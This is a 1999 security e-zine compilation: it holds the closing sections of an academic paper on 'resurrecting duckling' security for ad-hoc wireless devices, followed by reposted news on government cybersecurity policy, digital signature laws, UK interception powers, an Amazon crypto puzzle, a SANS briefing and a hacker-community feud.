      But many of our nodes lack the ability to do public key, and even if they did it would still not help much. Suppose that a doctor picks up a thermometer and tries to get his palmtop to do a Diffie-Hellman key exchange with it over the air. How can he be sure that
      the key has been established with the right thermometer? If both devices have screens, then a hash of the key might be displayed and verified manually; but this is bad engineering as it is both tedious and error-prone, and in an environment where we want neither.
      We are not likely to want to give a screen to every device; after all, sharing peripherals is one of the goals of ad-hoc networking. 
      
      In many applications, there will only be one satisfactory solution, and we advocate its use generally as it is effective, cheap and simple: physical contact. When the device is in the pre-birth state, simply touching it with an electrical contact that transfers the bits of
      a shared secret constitutes the imprinting. No cryptography is involved, since the secret is transmitted in plaintext, and there is no ambiguity about which two entities are involved in the binding. 
      
      Note that an imprinted duckling may still interact with principals other than its mother-it just cannot be controlled by them. In our medical application, we would usually want the thermometer to report the patient's temperature to any device in the ward which
      asked for it. Only in exceptional circumstances (such as a celebrity patient, or a patient with a socially stigmatised condition) would the patient require encrypted communications to a single doctor's PDA. So should we also have an option of imprinting the device
      with a cleartext access control list (and perhaps the patient's name), rather than an ignition key? 
      
      This brings us back to the issue raised at the end of section *, namely how we might enable a single device to support security mechanisms of differing strength. The solution that we favour is to always bootstrap by establishing a shared secret and to use strong
      cryptography to download more specific policies into the node. The mother can always send the duckling an access control list or whatever in a message protected by the shared secret. Having a key in place means that the mother can change its mind later; so if
      the patient is diagnosed HIV positive and requests secure handling of his data from then on, the doctor does not have to kill and reinitialise all the equipment at his bedside. In general, it appears sound policy to delegate from a position of strength. 
      
      
      
      Integrity
      
      So far we have seen that denial of service, the goals of authentication, and the mechanisms for identifying other principals are surprisingly different in an ad-hoc network. Is there any role for the more conventional computer security mechanisms? The answer
      appears to be a qualified yes when we look at integrity. 
      
      Integrity means ensuring that the node has not been maliciously altered. The recipient wants to be sure that the measurements come from the genuine thermometer and not from a node that has been modified to send out incorrect temperature values (maybe so
      as to disrupt the operation of the recipient's nuclear power plant). 
      
      If you can't afford signatures...
      
      Prudence dictates that a patient's temperature should only be measured by a "known good'' thermometer, such as one that passed a calibration inspection within the last six months. So it is natural for calibrators to issue signed dated certificates (though some care
      must be taken if some of the thermometer's prospective clients do not possess a clock). But the certificate could have been replayed by a middleman. What sort of mechanisms should be implemented to prevent this? 
      
      If the thermometer can perform digital signatures and the palmtop can check them, the solution is straightforward: the thermometer's calibration certificate can include the node's public key. Where the thermometer cannot perform public key cryptography, the
      palmtop will establish a common secret with the thermometer using the techniques of section * and, having verified its certificate, will be able to accept messages protected by a MAC keyed with the shared secret. 
      
      At this point, we depart once more from the conventional wisdom of the computer security community. The obvious objection is that, since neither certificates nor IDs are secret, a false device might be constructed which clones a genuine one; and that the only
      proper way to use a certificate is to certify a public key whose private key is known only to the device. However, this is tied up closely with the issues of tamper proofness and tamper evidentness. If our devices are not tamper-proof, then the private key can be
      read out and installed in a bogus device; but if they meet the much weaker requirement of tamper-evidentness (say with sealed enclosures), a forger will not be able to produce an intact seal on the bogus device. So we will have confidence in a certificate which
      we receive protected under an ignition key that we shared successfully with a device whose seal was intact. (This is the first example we know of a purely "bearer'' certificate: it need not contain a name or even a pseudonym.) We will now discuss this in more
      detail. 
      
      Tamper resistance
      
      The doctor's reliance on the "genuine thermometer'' certificate assumed that, after the thermometer was last inspected, calibrated and certified, it stayed that way. This assumption may be questioned in many applications, especially as in Piconet not all nodes are
      well guarded, highly personal accessories such as Java rings [java-ring-www] over which the owner is expected to keep close and continuous control. On the contrary, many nodes (such as broadcasting sensors) may be commodities that are scattered around
      and left to their fate. With such a model an attacker may, and sooner or later will, modify or forge a deployed node, possibly redeploying the corrupted node in an unsuspecting environment. 
      
      This can in theory be avoided by making the node tamper-proof, but it is much easier to talk about this property than to implement it in practice [tamper-resistance], especially within the cost and form factor constraints of personal consumer electronics devices.
      Under the circumstances, it is not clear how much extra assurance is given by furnishing our thermometer with the ability to do public key cryptography; such a device can have its private key read out just as a device with a certificate but without a private/public
      keypair can be forged. 
      
      In such environments it may often be more suitable to use physical tamper-evidence mechanisms (such as seals) rather than electronic mechanisms (such as tamper sensing switches that zeroise memory). In this case, one must still design the device so that
      non-intrusive attacks (such as those based on protocol failure, power analysis and glitch attacks [cheap-tamper]) are not practical; it is also necessary to take into account the time that might pass before a broken seal is noticed, and the likelihood of successful
      attacks on the sealing mechanism [johnston-seals]. 
      
      It must also be realised that the tampering may not be limited to the onboard code and keys: a very effective attack on the unattended thermometer is to simply replace its analogue sensing element with a bad one. This attack highlights that even enclosing the
      entire processor, memory and backup battery in a high-grade tamper resistant enclosure, with only a ribbon connector to interface with the outside world, would still leave us vulnerable to direct attacks on its "peripherals''. Bringing the sensor itself within the
      tamper resistant enclosure may make manufacturing too expensive (the computing and communication core willl no longer be a modular building block) and may even interfere with the proper working of the sensor. So the transducer may be an Achilles' heel,
      and it may not be worth spending large sums on tamper-proofing the core if the sensor cannot economically be protected. 
      
      When making decisions about what level of tamper-proofness or tamper-evidentness a system needs, it is as well to bear in mind that corrupt nodes can be used in a number of ways. Attacks might be immediate and direct, or alternatively the attacker might field
      a number of nodes which would accept software upgrades from him as well as from the authorised source. 
      
      Software upload
      
      For nodes to be useful, there has to be a way to upload software into them, if nothing else during manufacture; in many applications we will also want to do this after deployment. So we will want to prevent opponents from exploiting the upload mechanism,
      whatever it is, to infiltrate malicious code, and we will want to be able to detect whether a given node is running genuine software or not. 
      
      Neither of these goals can be met without assuming that at least some core bootstrap portion of the node escapes tampering. The validity of such an assumption will depend on the circumstances; the expected motivation and ability of the attackers, and the effort
      spent not just on protecting the node with tamper-resistance mechanisms and seals, but in inspection, audit and other system controls. 
      
      
      
      Confidentiality
      
      We find that we have little to say about confidentiality other than remarking that it is pointless to attempt to protect the secrecy of a communication without first ensuring that one is talking to the right principal. Authenticity is where the real issues are and, once
      these are solved, protecting confidentiality is simply a matter of encrypting the session using whatever key material is available. 
      
      In the event that covert or jam-resistant communications are required, then the key material can be used to initialise spread-spectrum or frequency-hopping communication. Note that, in the absence of shared key material and an accurate time source, such
      techniques are problematic during the important initial resource discovery phase in which devices try to determine which other nodes are nearby. 
      
      
      
      Conclusions
      
      We examined the main security issues that arise in an ad-hoc wireless network of mobile devices. The design space of this environment is constrained by tight bounds on power budget and CPU cycles, and by the intermittent nature of communication. This
      combination makes much of the conventional wisdom about authentication, naming and service denial irrelevant; even tamper resistance is not completely straightforward. 
      
      There are interesting new attacks, such as the sleep deprivation torture, and limitations on the acceptable primitives for cryptographic protocols. However, there are also new opportunities opened up by the model of secure transient association, which we believe
      may become increasingly important in real networking applications. 
      
      The contribution of this paper was to spell out the new problems and opportunities, and to offer a new way of thinking about the solution space-the resurrecting duckling security policy model. 
      
      
      
      Acknowledgements
      
      We thank Alan Jones for suggesting the wireless thermometer, a prototype of which had just been built in the context of Piconet, as a minimal but still meaningful practical example. 
      
      
      References
      
      [tamper-resistance]
      Ross Anderson and Markus Kuhn. Tamper resistance-a cautionary note. In Proc.2nd USENIX Workshop on Electronic Commerce, 1996. 
      
      [cheap-tamper]
      Ross Anderson and Markus Kuhn. Low cost attacks on tamper resistant devices. In Mark Lomas et al., editor, Security Protocols, 5th International Workshop Proceedings, volume 1361 of Lecture Notes in Computer Science, pages 125-136.
      Springer-Verlag, 1997. 
      
      [irda-www]
      Infrared Data Association. http://www.irda.org/. 
      
      [piconet97]
      Frazer Bennett, David Clarke, Joseph B. Evans, Andy Hopper, Alan Jones, and David Leask. Piconet: Embedded mobile networking. IEEE Personal Communications, 4(5):8-15, October 1997. 
      
      [Biba1975]
      Kenneth J. Biba. Integrity considerations for secure computer systems. Technical Report MTR-3153, MITRE Corporation, April 1975. 
      
      [homerf-www]
      HomeRF Working Group. http://www.homerf.org/. 
      
      [bluetooth98]
      Jaap Haartsen, Mahmoud Naghshineh, Jon Inouye, Olaf J. Joeressen, and Warren Allen. Bluetooth: Visions, goals, and architecture. ACM Mobile Computing and Communications Review, 2(4):38-45, October 1998. 
      
      [firewire]
      IEEE. IEEE standard for a high performance serial bus. IEEE Standard 1394, 1995. 
      
      [johnston-seals]
      Roger G. Johnston and Anthony R.E. Garcia. Vulnerability assessment of security seals. Journal of Security Administration, 20(1):15-27, June 1997. 
      
      [Lorenz]
      Konrad Lorenz. Er redete mit dem Vieh, den Vgeln und den Fischen (King Solomon's ring). Borotha-Schoeler, Wien, 1949. 
      
      [java-ring-www]
      Sun Microsystems. http://java.sun.com/features/1998/03/rings.html. 
      
      [homerf98]
      Kevin J. Negus, John Waters, Jean Tourrilhes, Chris Romans, Jim Lansford, and Stephen Hui. HomeRF and SWAP: Wireless networking for the connected home. ACM Mobile Computing and Communications Review, 2(4):28-37, October 1998. 
      
      [bluetooth-www]
      Bluetooth SIG. http://www.bluetooth.com/. 
      
      
      [LaTeX -> HTML by ltoh]
      http://www.cl.cam.ac.uk/~fms27/duckling/ (frank.stajano@cl.cam.ac.uk) 
      Last modified: May 20 1999 
      
      @HWA

83.0  GOV'T IT EXECS SEEK SOFTWARE ACCOUNTABILITY
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      From HNS http://www.net-security.org/
       
      by Thejian, Wednesday 20th October 1999 on 11:05 pm CET
      Federal agencies, which have begun spending millions to upgrade information
      security in response to a presidential directive, say protecting computer networks will
      also mean finding ways to hold software vendors accountable for the quality of their
      products. John Gilligan, CIO of the U.S. Department of Energy, said users have to
      "focus our attention" on better defining the expectations and enforcement of
      warranties for commercial software. Vendors must "provide products that will either be
      free from certain types of vulnerabilities or reliability problems or they will have
      financial liability". Computerworld. 
      
      (Online News, 10/19/99 04:54 PM)



           Gov't IT execs seek 'software
                     accountability'
                        By Patrick Thibodeau


       ARLINGTON, Va. -- Federal agencies, which have begun
       spending millions to upgrade information security in
       response to a presidential directive, say protecting
       computer networks will also mean finding ways to hold
       software vendors accountable for the quality of their
       products. 

       John Gilligan, CIO of the U.S. Department of Energy, said
       users have to "focus our attention" on better defining the
       expectations and enforcement of warranties for commercial
       software. 

       Vendors must "provide products that will either be free from
       certain types of vulnerabilities or reliability problems or they
       will have financial liability," said Gilligan, speaking today at
       the U.S. Department of Commerce's National Information
       Systems Security Conference. 

       Federal agencies were ordered by President Clinton last
       year to do what's necessary to protect critical systems from
       information security threats. The order set off a scramble
       among agencies to develop security plans and seek money
       from Congress. 

       But some issues aren't easily addressed. U.S. agencies are
       becoming "increasingly more reliant on commercial
       off-the-shelf products" said Christopher Mellon, deputy
       assistant secretary of defense for security and information
       operations. 

       And it's difficult to tell, in some cases, where commercial
       software code "was written, what its heritage is and to even
       know what it is you are buying," he said. 

       Defense and other federal agencies are working on plans to
       improve information security through training, vulnerability
       testing and system improvements that include developing
       incident-response teams to tackle security threats.
       Agencies are also improving training for
       system-administration workers. 

       But Congress is balking on funding. The Commerce
       Department is seeking some $79 million for its
       information-security work; and the Department Energy,
       which was plagued by an espionage scandal, asked for
       some $35 million this year, which it has not yet received. 

       Federal officials say security funding is cost effective. One
       security incident can cost as much as $500,000 to repair. 

       As with private industry, the information security threats
       posed by disgruntled employees are greater for government
       systems than attacks from outside. But an exception to that
       rule is the National Aeronautics and Space Administration.
       According to David Nelson, the deputy CIO at NASA, most
       of its system attacks and intrusions come from outside the
       agency. Nelson said he's puzzled by it. About the only thing
       that can explain it, Nelson concluded, "is NASA is a pretty
       good place to work." 
       
       @HWA

84.0   DEFAULT #7 OUT
       ~~~~~~~~~~~~~~ 
       
       From HNS http://www.net-security.org/
       
       by BHZ, Wednesday 20th October 1999 on 11:05 pm CET
       Default issue seven was released. Again you could read some
       interesting topics: 5 reasons why your Mac is safer than winte,
       Setting up a great desktop Linux, How to make safe Windows 95 
       based server, Apple Power Mac G4, Web based encrypted
       e-mail (critic and the response), More from the ACPO front, 
       Welcome to the wonderful world of cellular phreaking, Unix 
       logging and auditing tools). 
       
       Default and default webboard.             
       
       http://default.net-security.org
       http://www.net-security.org/webboard.html
       
       @HWA
       
85.0   UK POLICE GETTING THE POWER TO TAP E-MAIL?
       ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
       
       From HNS http://www.net-security.org/
       
       by Thejian, Wednesday 20th October 1999 on 1:45 am CET
       UK computer users who refuse to divulge their passwords to the authorities face up to
       two years in jail under increased police powers to be unveiled in next month's
       Queen's speech. Other measures drawn up by the government will make it easier for
       companies to monitor employees' phone calls and e-mails. A third part of the
       crackdown will give the police new authority to tap mobile phone calls, pager
       messages and e-mail. The Sunday Times.        
       
       http://www.sunday-times.co.uk/news/pages/sti/99/10/17/stinwenws01031.html?999
       
       October 17 1999                          BRITAIN



       Police to get power to tap e-mail 

       Michael Prescott, Political Editor


       COMPUTER users who refuse	to divulge their passwords
       to the authorities face up to two	years in jail under increased
       police powers to be unveiled in next month's Queen's
       speech. 
      
       Other measures drawn up by the government	will make it
       easier for companies to monitor employees' phone calls and
       e-mails. A third part of the crackdown will give the police
       new authority to tap mobile phone	calls, pager messages and
       e-mail. 
      
       The plans	were already attracting	criticism last night, with
       one Tory MP warning that the government risked creating "a
       state surveillance system	like something out of Orwell's
       1984". 
      
       Government ministers will	justify	the measures as	necessary
       to trap pornographers, drug traffickers and fraudsters who
       exploit new technology. Police officers who gain a search
       warrant from the courts can already look at computer files,
       but provisions in	the forthcoming	e-commerce bill	will allow
       them to demand passwords used to protect sensitive data. A
       suspect who witholds them	faces a	jail term of up	to two
       years. 
      
       "Paedophiles and drug barons tend	to send	material that can
       be unlocked only if you know a code often	extending to
       many digits," said a senior government source last night.	"The
       law has to catch up with this." 
      
       The bill will also legally oblige	internet service providers
       (ISPs) to	keep records showing to	and from whom material
       has been sent and	received. In spite of industry complaints
       about the	cost, ministers	want the ISPs to keep detailed
       records on all customers for days	at a time. 
      
       "The provision will prove	invaluable in tracking down
       paedophile rings,	for example," said a source at the
       Department of Trade and Industry,	which has drawn	up the
       measure in co-operation with the Home Office. 
      
       Many companies monitor employees'	phone calls and
       e-mails to ensure	customers and clients are being	dealt with
       according	to required standards. This is a grey area legally,
       but the Home Office is to	give firms a legal right to monitor
       their workers, so	long as	they warn them that this is company
       practice.	
      
       The proposed new Interception of Communication Act will
       also deal	with criminals who frequently change their mobile
       phone numbers and	e-mail addresses, to exploit the fact that
       warrants are issued for a	particular number or address. New
       catch-all	warrants will cover all	of a named individual's
       communications devices and will last for three months
       instead of two. 
      
       @HWA
       
86.0  WASHINGTON DIVIDED ON NET SIGNATURES BILL
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      From HNS http://www.net-security.org/
       
      by Thejian, Wednesday 20th October 1999 on 1:25 am CET
      Continuing confusion over just what version of digital signature legislation will be
      considered on the floor of the House of Representatives has caused House leadership
      to pull consideration of the bill until next week. Aides to House Majority Leader
      Richard Armey did not return telephone calls seeking comments, but a reliable
      congressional source told Newsbytes that the House Judiciary and Commerce
      Committees still need to work out some kind of compromise on their different versions
      of the bill before it goes through the Rules Committee and eventually to the House
      floor. 
      
      http://www.newsbytes.com/pubNews/99/138045.html
      
      House Won't Vote On Net Signatures Today 

     
      By Robert MacMillan, Newsbytes
      WASHINGTON, DC, U.S.A., 
      19 Oct 1999, 3:57 PM CST
 
      Continuing confusion over just what version of digital signature 
      legislation will be considered on the floor of the House of 
      Representatives has caused House leadership to pull consideration
      of the bill until next week. 
 
      Aides to House Majority Leader Richard Armey, R-Texas, did not return
      telephone calls seeking comments, but a reliable congressional source
      told Newsbytes that the House Judiciary and Commerce Committees still 
      need to work out some kind of compromise on their different versions 
      of the bill before it goes through the Rules Committee and eventually 
      to the House floor. 
 
      A source in the Commerce Committee said that the committee still is 
      optimistic about working out a version of the legislation that suits
      their interests, despite the fact that the Judiciary Committee made 
      substantial changes to their version of the bill. 
 
      It now is up to Rules Committee Chairman David Dreier, R-Calif., and 
      his colleagues either to help forge compromise legislation between the
      two committees, to choose one version of the bill to send to the floor
      for a vote, or even to send both versions for consideration. 
 
      The bill, H.R. 1714, known as the E-SIGN Act, had been scheduled for a
      quick suspension vote in the House today, but House sources confirmed 
      that the bill had been pulled this morning. 
 
      The purpose of the legislation is to provide a national framework that
      legalizes the use of digital signatures, but many Democratic members 
      were concerned that it unfairly preempts states from enforcing their 
      own laws. 
 
      Republicans on the Judiciary Committee argued that the Democratic 
      alternative wipes out the purpose for the legislation, which is to 
      develop a national legal standard to make digital signatures legally
      binding. 
 
      Reported by Newsbytes.com, http://www.newsbytes.com . 
 
      15:57 CST
      Reposted 17:34 CST 
      
      @HWA 
      
87.0  FEDS STILL HAVING TROUBLE FINDING CYBERSECURITY
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      From HNS http://www.net-security.org/
       
      by Thejian, Wednesday 20th October 1999 on 1:10 am CET
      Despite mounting pressure from Congress to make tangible progress on the
      governmentwide effort to protect critical federal information systems from hackers and
      other criminals, agencies continue to struggle with funding, personnel and training
      roadblocks, officials said today. Under Presidential Decision Directive 63, signed in
      May 1998, all federal agencies are required to develop plans and take steps to protect
      their critical infrastructure. Agency CIOs, however, are having serious problems
      finding the resources to actually follow this through. Federal Computer Week. 
      
      http://www.fcw.com/pubs/fcw/1999/1018/web-pdd-10-19-99.html
      
      OCTOBER 19, 1999 . . . 14:31 EDT 


      Feds having trouble finding money, people for
      cybersecurity

      BY DIANE FRANK (dfrank@fcw.com)

      CRYSTAL CITY, Va. -- Despite mounting pressure from Congress to
      make tangible progress on the governmentwide effort to protect critical federal
      information systems from hackers and other criminals, agencies continue to
      struggle with funding, personnel and training roadblocks, officials said today.

      Under Presidential Decision Directive 63, signed in May 1998, all federal
      agencies are required to develop plans and take steps to protect their critical
      infrastructure. Agency chief information officers have been charged with
      leading the protection of information systems under PDD 63 and are receiving
      pressure from administrators, Congress and auditors to install protective
      measures as soon as possible. 

      Agency CIOs, however, said they are having trouble finding the resources to
      follow through. 

      "It requires a lot of dollars to do PDD 63," said Roger Baker, CIO at the
      Commerce Department, during a panel session at the National Information
      Systems Security conference here. Making matters worse, the Office of
      Management and Budget has told Commerce to find the money it needs for
      cybersecurity within current budgets, not from new appropriations, Baker
      said. 

      Other agencies are experiencing similar problems, including the Energy
      Department, which, despite several high-profile security breaches, recently
      lost its battle with Congress to get $35 million added to its fiscal 2000 budget
      for cybersecurity, said John Gilligan, CIO at DOE. 

      Although lack of personnel is another well-known problem, most agencies are
      finding out that the real issue is training and awareness for current employees. 

      NASA, for example, recently worked with the Defense Information Systems
      Agency to develop a new multimedia training CD-ROM that all NASA
      personnel are required to use. However, managers and system administrators
      require a different level of training, and the agency is putting together a pilot
      certification program at the John H. Glenn Research Center in Ohio.

      "System administrators are a critical point for us, and we are not yet happy
      about our training for our system administrators," said David Nelson, acting
      deputy CIO at NASA.

      Like many agencies, the Defense Department also is working with other
      agencies and with industry to find commercial products that meet the agency's
      security needs.

      "We need to work together and communicate [and] collaborate more closely
      than ever before in order to be effective," said Christopher Mellon, deputy
      assistant secretary of Defense for security and information operations. 

      One solution DOD is considering is issuing a directive that Defense agencies
      must use products validated by the National Information Assurance
      Partnership, he said. The NIAP is a joint effort by the National Security
      Agency and the National Institute of Standards and Technology to certify that
      commercial products meet security standards. 
      
      @HWA
      
88.0  CALIFORNIA TAKES DIGITAL SIGNATURES INTO USE
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      From HNS http://www.net-security.org/
      
      by Thejian, Wednesday 20th October 1999 on 0:45 am CET
      Yesterday California officially authorized Verisign Inc.
      to begin issuing digital signature certificates to secure
      communications between state agencies and between the 
      state and its citizens, ushering in a new era of electronic
      services delivery. Bill Jones, California's secretary of 
      state, marked the occasion by digitally "signing" the 
      authorization certificate for the company, making it the 
      first such transaction since the state passed a law that 
      spelled out the requirements for legally
      binding digital signatures. CNN. 
      
      California inaugurates digital
      signatures 

      October 19, 1999
      Web posted at: 9:40 a.m. EDT (1340 GMT)

      by Dan Caterinicchia 
 

      (IDG) -- Yesterday California officially
      authorized Verisign Inc. to begin
      issuing digital signature certificates to
      secure communications between state
      agencies and between the state and its
      citizens, ushering in a new era of
      electronic services delivery. 

      Bill Jones, California's secretary of state, marked the 
      occasion by digitally "signing" the authorization 
      certificate for the company, making it the first such
      transaction since the state passed a law that spelled
      out the requirements for legally binding digital 
      signatures.

      "We're bringing in the private sector to help us
      to create the opportunity for the public to
      access [government] services more quickly,"
      Jones said. "Our goal is to deliver something
      that's easily accessible but doesn't add to the
      layers of government."

      Digital signatures are seen as a vital component
      of Internet-based commerce because they
      authenticate the identities of the parties involved 
      in a transaction. Verisign, based in Mountain View, 
      Calif., was the first to satisfy California's digital
      signature requirements. 

      Jones said his department is interested in
      using digital signatures to enable residents to
      cast votes over the Internet. Other agencies
      have expressed a desire to use the tool to
      secure business filings and similar
      transactions, he said.

      Stratton Sclavos, Verisign's president and
      chief executive officer, said that for all the
      Internet has done to change the commerce
      landscape domestically and abroad, so far it
      has missed the "citizen-government relationship." He
      added that digital signature certification and the 
      host of services it affects will exact a "fundamental
      change in the way citizens are going to interact with
      [state and local] government."

      Verisign is working on similar digital signature 
      projects in Oregon, New Jersey, Utah and Washington,
      Sclavos said. 
      
      @HWA
      
89.0  AMAZON'S CRYPTO CONTEST CRACKED WITHIN HOURS
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      From HNS http://www.net-security.org/
      
      by Thejian, Wednesday 20th October 1999 on 0:05 am CET
      On Monday, Amazon launched a two-week contest asking 
      users to decipher the hidden meaning behind five lines 
      of seemingly random numbers. The prize: a package
      of crypto books and a programmable robot kit. Hours 
      after its launch, news of the contest hit the Internet
      code-cracking community in a big way. And in a few more
      hours, cryptographers were already talking about how 
      they solved the puzzle. Wired. 
      
      Code Crunchers Crack Contest by Joanna Glasner

      1:35 p.m. 19.Oct.99.PDT A cure for the common code was reportedly found by 
      a bunch of cryptographers this week. 

      On Monday, Amazon launched a two-week contest asking users to decipher the 
      hidden meaning behind five lines of seemingly random numbers. The prize: a 
      package of crypto books and a programmable robot kit. 


        The entrants: Just about anyone, really. No math degree needed, Amazon 
        pledged. Heck, the online retailer even promised to throw in a couple of 
        hints along the way to help out the less code-adept. 

      As it turned out, it wasn't necessary. 

      Hours after its launch, news of the contest hit the Internet code-cracking 
      community in a big way. And in a few more hours, cryptographers were 
      already talking about how they solved the puzzle.

      The hoopla began around 7 p.m. EDT on Monday, when Bradley Beth, a 
      computer programmer from Richardson, Texas, sent an email posting about 
      the contest to nerd-centric news and gossip site Slashdot.org. 

      Within minutes, dozens of code-crunchers set to work on the puzzle, 
      posting their theories along the way. 

      Software developer Rob Montaro pitched in with what others took as a key 
      insight: that some of the seemingly random numerals posted on Amazon's 
      site actually matched up with the numbers used to reference books, known 
      in publishing circles as ISBN numbers. 

      Once that clue hit the wires, the rest was pretty easy, said Boston 
      software engineer Seth Finkelstein. He spent a few minutes writing a PERL 
      script to analyze the code and develop a few solutions based on Montaro's 
      insight. 

      In a couple of hours, he came up with a somewhat strangely worded but 
      reasonably coherent solution that he eventually posted online. It was one 
      of several such postings. 

      (To see Amazon's crypto puzzle and Finkelstein's solution, click here.) 

      Finkelstein shied away from taking credit for his feat. He said he's not 
      certain the answer is entirely correct, adding it took no great skill to 
      come up with a reasonable interpretation. 

      "It's not a serious contest," he said. "The sheer number of people who 
      cracked it show it is not useful for hiding a message. You wouldn't want 
      your financial records to be protected this way." 

      Amazon said the contest wasn't intended as a serious crypto test, but more 
      as a kind of puzzle that might appeal to its code-crunching customers. 
      Jennifer Buckendorff and Therese Littleton, the two Amazon site editors 
      who designed the contest, saw it more as "a rainy afternoon treat for 
      geeks" and a way to promote crypto-themed books. 

      The company didn't disclose how many contest entries it has received, or 
      whether any were correct. The winner will be chosen through a random 
      drawing of correct entries at the end of the month. 

      In the meantime, a few people thought the contest was being taken a bit 
      too seriously. Or, in the words of one Slashdot poster: 

      "This contest is supposed to be winnable by people who get stumped by 
      crossword puzzles in USA Today, not by some paranoid lunatic that uses 
      Ordo Novus Seclorum to read his email and encrypts his grocery list so 
      that no one will find out he's buying stinky cheese and miniature 
      vegetables." 

      @HWA
      
90.0  SANS: CYBERSECURITY RISKS REAL      
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      From HNS http://www.net-security.org/
      
      
      by Thejian, Tuesday 19th October 1999 on 4:45 am CET
      The SANS Institute held one of its briefing last week to help IT 
      managers debunk several myths that senior managers hold about computer
      security. The briefing took participants on four virtual "field trips"
      to the sites of actual past cyberattacks to convince them the threat is
      real. Computerworld.  
      
      http://www.computerworld.com/home/news.nsf/idgnet/9910181sans
      
      (Online News, 10/18/99 04:58 PM)



         SANS: Cybersecurity risks real
                         By Ann Harrison


      BEDFORD, Mass. -- On behalf of IT managers whose
      bosses may be skeptical about security risks, the SANS
      Institute offered a briefing last week that took participants on
      four virtual "field trips" to the sites of cyberattacks. The
      Washington-based cooperative research and education
      organization, which distributes information on computer
      security issues, held the briefing at MITRE Corp. 

      The field trips were created to help IT managers debunk
      several myths that senior managers hold about computer
      security, said Alan Paller, the institute's director of research,
      who led the presentation. 

      The first scenario, at the Oroville Dam in the Central Valley
      of California, was designed to dispel the myth that computer
      crackers can't do real damage. Paller explained that in
      1992, the FBI determined that a cracker had obtained root
      or administrative access to computers that controlled every
      dam in the northern part of California. Pallor pointed out that
      even "noncritical" computers are networked to systems that
      have critical functions, such as controlling dam gates. 

      The second field trip involved a 1998 incident when a
      Massachusetts teen-ager broke into the Bell Atlantic
      telephone system and disabled communication at the
      Worcester airport, preventing the airport's control tower
      from turning on runway lights for incoming flights. The
      scenario debunked the myth that crackers who do access
      systems have no malicious intent. 

      Another example took on the notion that it is rare for
      someone to have enough skill and knowledge to break in to
      a professionally managed government computer. This
      scenario brought participants into a cracker's lab and
      showed the steps he might take to break in to a system. 

      A final scenario brought attendees into a mock U.S.
      intelligence debriefing to evaluate the indications and
      warning signs after a cyberwar. The development of this
      scenario was funded by the National Security Agency and
      included power blackouts, passenger jet collisions, Alaska
      pipeline leaks and attacks on nuclear plants. The
      demonstration showed, among other things, how difficult it
      was to trace well-executed Web hacks due to Internet
      Protocol (IP)address spoofing, which can implicate innocent
      parties. 

      At the conclusion of the presentation, Paller noted that
      results of security vulnerability tests to avoid cyberattacks
      often load system administrators with more tasks than they
      can handle, jeopardizing overall system security. He noted
      that online SNAP (System and Network Assurance
      Program) classes and off-line workshops detailed at
      www.sans.org are aimed at helping system administrators
      identify critical security weaknesses, prioritize corrective
      action and provide intensive training in security skills. 

      Harold Leach Jr. of Legal Computer Solutions Inc. in
      Boston, which offers an Internet-based litigation support
      tool, said he was impressed by the presentation and
      interested in the SANS training. "It comes down to a
      question of risk, you fix the riskiest things first, but the
      problem is figuring out what the riskiest things are," Leach
      said. 
      
      @HWA
      
91.0  "INTERVIEW" WITH MISTUH CLEAN
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      From HNS http://www.net-security.org/
       
      by Thejian, Monday 18th October 1999 on 6:15 pm CET
      Singapore is still in the bane of the hackers, Samantha Santa
      Maria of the Straits Times asked mistuh clean, who recently 
      defaced several sites over there, some questions regarding 
      the subject. 
      
      http://www.straitstimes.asia1.com/cyb/cyb3_1017.html
      
      Unfortunately this url has expired and gave me a 404, i was
      unable to find this 'interview' anywhere on the net, this is 
      one reason for an archival newsletter such as this but I was
      too late in retrieving this story... sorry.
      
      @HWA    
      
92.0  Inside Happy Hacker Oct 20th
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      From AntiOnline mailing list.
      
      http://www.antionline.com/
      
      
      ----------------------------------------------------------------
      The following message was sent out via the AntiOnline Network.
      Please keep in mind, that the views and opinions expressed in 
      this article are solely those of the message's author, and may 
      not necessarily be the views and opinions of AntiOnline.
      
      Looking for a free e-mail account?  Check out AntiOnline's
      Free Mail Service at
      <http://www.antionline.com/mail>http://www.AntiOnline.com/mail/
      -----------------------------------------------------------------
                      __ __                      __ __         __
                     / // /__ ____  ___  __ __  / // /__ _____/ /_____ ____
                    / _  / _ `/ _ \/ _ \/ // / / _  / _ `/ __/  '_/ -_) __/
                   /_//_/\_,_/ .__/ .__/\_, / /_//_/\_,_/\__/_/\_\\__/_/
                            /_/  /_/   /___/
      
      Inside Happy Hacker, Oct. 20, 1999
      _______________________________________________________________________
      
      Table of Contents
      
       New York Times Exposes Smear Campaign against Vranesevich 
       The Stephen Glass Syndrome (reporters who write hacker stories that they know
      are false)
       Where the heck have we been?
       Call for editors
      
      
       ***  New York Times Exposes Smear Campaign against Vranesevich
      _______________________________________________________________________ 
      
      Just in case you are wondering whether the stories Sprenger, Koch, and
      Penenberg have written about Vranesevich could possibly have any substance,
      please read a recent article in the New York Times about him.  Reporter Matt
      Richtel actually interviewed the people involved instead of writing stories
      manufactured by Brian Martin and his imaginative crew at Attrition.org.  
      Following are some highlights of Richtel's report:
      http://www.nytimes.com/library/tech/99/10/cyber/articles/08hackers.html
      
      .The new Vranesevich started to help government officials find people accused
      of malicious hacking. He said he turned over information to the FBI that led it
      to raid the home of a hacker named Brian Martin in connection with an attack on
      The New York Times' Web site in September 1998. 
      
      .Martin, who admits to some malicious hacking in his past but says he has been
      an above-board security consultant for years, is a member of Attrition.org, a
      hacker group that has spearheaded an effort to discredit Vranesevich. .The
      group also says that Vranesevich paid a hacker to break into the Web site of
      the United States Senate so that AntiOnline could be the first to report it --
      an accusation Vranesevich denies.
      
      Special Agent Jim Margolin of the FBI said the agency does not comment on
      whether it has investigated someone in the past. "But we continue to consult
      with Mr. Vranesevich, and that should say something about our assessment of his
      bona fides," he said. 
      
      . his site continues to grow... Vranesevich runs it out of a rented three-room
